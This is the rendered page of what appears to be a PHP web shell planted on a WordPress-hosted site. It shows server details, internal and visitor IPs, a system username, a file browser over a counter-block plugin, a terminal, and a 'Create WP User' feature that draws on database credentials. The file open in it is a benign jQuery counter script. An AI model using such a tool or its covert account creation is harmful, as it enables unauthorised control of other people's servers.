Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.38
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat.net.pl
/
wp-content
/
plugins
/
counter-block
/
assets
/
js
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
counter.js
1.32 KB
-rw-r--r--
2026-02-26 11:36
jquery-numerator.js
3.50 KB
-rw-r--r--
2026-02-26 11:36
jquery-numerator.min.js
1.76 KB
-rw-r--r--
2026-02-26 11:36
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
counter.js
( function ( $ ) { // Counter window[ 'ibCounter' ] = function () { var $counters = $( '.ib-counter' ); $counters.each( function () { if ( $( 'body' ).hasClass( 'wp-admin' ) && $( this ).parents( '.wp-block-ideabox-counter.is-selected' ) .length === 0 ) { return; } if ( $( window ).scrollTop() > $( this ).offset().top - window.innerHeight ) { var $element = $( this ).find( '.ib-counter-number' ), data = { fromValue: $element.attr( 'data-from-value' ), toValue: $element.attr( 'data-to-value' ), delimiter: $element.attr( 'data-delimiter' ), duration: $element.attr( 'data-duration' ), onComplete: function () { $element.addClass( 'ib-counter-complete' ); }, }, decimalDigits = data.toValue.toString().match( /\.(.*)/ ); if ( decimalDigits ) { data.rounding = decimalDigits[ 1 ].length; } if ( 'none' === data.delimiter ) { data.delimiter = ''; } if ( $( 'body' ).hasClass( 'wp-admin' ) ) { data.onComplete = function () {}; $element.empty(); } if ( ! $element.hasClass( 'ib-counter-complete' ) ) { $element.numerator( data ); } } } ); }; if ( $( '.ib-counter' ).length > 0 ) { ibCounter(); $( window ).on( 'scroll', function () { ibCounter(); } ); } } )( jQuery );
关闭
保存